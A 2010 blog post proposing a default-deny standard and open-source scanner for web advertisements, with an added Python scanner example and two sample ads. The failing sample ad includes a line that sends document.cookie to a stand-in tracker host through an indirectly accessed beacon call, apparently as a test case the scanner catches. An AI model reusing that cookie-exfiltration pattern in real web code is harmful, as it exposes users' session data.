Friday, March 26, 2010

Save the web content providers

Web content is funded by advertisements.  But the advertisements often contain malware--everything from relatively benign tracking cookies (that only invade your privacy from afar, like binoculars looking into your bedroom window) to very dangerous keyloggers (that actively attempt to steal your passwords, identity, and money).

CNET recently reported on a study by Avast, an anti-virus company, that showed a handful of major news sites were responsible for more than a hundred thousand malware infections in a week.  Savvy internet users are wising up and blocking the advertisements, with products like AdBlock Plus (which reports more than 75 million downloads).  Content providers are experimenting with blocking AdBlock users from seeing content, and with moving away from advertising to a subscription model.

We need to figure out a way to flush the malware out of the advertising, so we can have revenue for the content producers and security for the content consumers.

I am proposing a solution to this problem.  It's not a simple solution.  But it is a robust solution that will scale and grow with the internet as technologies and tactics change.

There are several components to the solution.  There are technology changes.  There are process changes.  There are organizational changes.

Technologically, advertisements need to be reined in.  Senior coders and software security experts need to meet and talk, and then define a standard of which functions and features may be used in advertisements.  This has to be broken down in specific terms on a language-by-language basis.  It will be easier to start with the assumption that all features and functions of all languages are banned until explicitly allowed.

The list of allowed functions will be quite short, I predict.  Any function that doesn't display or manipulate content within the browser will be excluded.  That list, however short or long, is the type of thing that we can programmatically enforce.  And I propose that we do exactly that.

We should build an open-source code-scanner program that quickly examines advertisements and provides a simple pass or fail grade.  Advertisement developers should plug this program into their source-code repository to ensure that they are obeying the standards.

The connection between web content providers and advertisement providers has to change, also.  Right now content providers hotlink the advertisements from the advertisement providers' servers.  That has to end.  Content providers have to take responsibility for the content that they are executing in their clients' browsers.  This means that content providers have to build advertisement servers in their networks, and advertisement providers have to submit their ads to the content providers for them to store and serve locally.  The open-source code checking program that we developed above must be connected to the content providers' advertisement stores.  Once an advertisement passes through that checkpoint the advertisers cannot touch it.

The advertisers will need some way to count impressions.  So among the approved functions (on the list above) there must be a method for the advertisement to call back to the advertisers' servers with some content to prove that the ad was served.  We will have to negotiate and determine exactly what that content will be, but I would suggest the viewer's IP address and the URL of the page that served the ad.  And I would suggest that the advertisement gets to make one-and-only-one of these calls (this is also something that our scanner program can scan for).
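To make the scanner idea concrete, here is an added example (not code from the post) of a default-deny pass/fail check over an advertisement's JavaScript: every call must be on the allow-list, computed property access is refused outright, and the impression callback must appear exactly once.  The allow-list contents, the callback name `reportImpression`, and both sample ads are constructed for this illustration; the scan is text-level, and a production scanner would use a real JavaScript parser.

```python
import re

# Hypothetical allow-list (constructed for this example). The post argues the real
# list must be negotiated by advertisers, content providers and security experts;
# anything not listed here is denied.
ALLOWED_METHODS = {"getElementById", "createElement", "setAttribute", "appendChild"}
ALLOWED_GLOBALS = set()           # no free-standing global functions are allowed
BEACON = "reportImpression"       # assumed name of the single impression callback
JS_KEYWORDS = {"if", "for", "while", "switch", "catch", "return", "function", "typeof"}

CALL_RE = re.compile(r"([A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*)\s*\(")
DYNAMIC_RE = re.compile(r"[\w$)\]]\s*\[")   # obj[expr]: computed property access
STRING_RE = re.compile(r'"(?:[^"\\]|\\.)*"|\'(?:[^\'\\]|\\.)*\'')


def scan_ad(source):
    """Return ("PASS" or "FAIL", list of findings) for one advertisement script."""
    # Blank out comments and string literals so their text is not scanned as code.
    code = re.sub(r"//[^\n]*", "", source)
    code = STRING_RE.sub('""', code)
    findings = []
    if DYNAMIC_RE.search(code):
        findings.append("computed property access obj[...] is not allowed")
    beacon_calls = 0
    for m in CALL_RE.finditer(code):
        name = m.group(1)
        if name in JS_KEYWORDS or code[:m.start()].rstrip().endswith("function"):
            continue                      # control flow or a function definition
        if name == BEACON:
            beacon_calls += 1
            continue
        method = name.rsplit(".", 1)[-1]
        if ("." in name and method in ALLOWED_METHODS) or name in ALLOWED_GLOBALS:
            continue
        findings.append("call to %r is not on the allow-list" % name)
    if beacon_calls != 1:
        findings.append("expected exactly one %s() call, found %d" % (BEACON, beacon_calls))
    return ("PASS" if not findings else "FAIL", findings)


# Constructed sample advertisements: one that obeys the rules, one that does not.
GOOD_AD = """var box = document.getElementById("ad-slot");
var img = document.createElement("img");
img.setAttribute("src", "https://ads.example/banner.png");
box.appendChild(img);
reportImpression(location.href);"""

BAD_AD = """var box = document.getElementById("ad-slot");
box.innerHTML = "<b>You have won a prize</b>";
reportImpression(location.href);
reportImpression(location.href);
var send = navigator["sendBeacon"];
send("https://tracker.example/log", document.cookie);"""
```

Running `scan_ad` on the two samples gives PASS with no findings for the first and FAIL with three findings for the second (computed access, an unlisted call, and two beacon calls instead of one).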

In order to build and maintain the list and program we have to get some interested parties together to talk.  This is the internet, so we can do much (or maybe all) of this electronically.  But I suspect that we will have to have an actual conference-type meeting or two.  We need to get three groups engaged: advertisers, content providers, and security experts.  This will have to be an ongoing program, where advertisers can petition to get more functions added to the allowed list and security experts can petition to get them removed.  And all three groups will want to code-review the scanner program, when it gets updated.  Therefore, I think that a group like W3C should host and manage the process.

Content providers who limit their advertisements to these scanned-and-approved types would be immune to products like AdBlock because the advertisements and content would come from the same server--AdBlock works by actively blocking the advertising companies' servers.
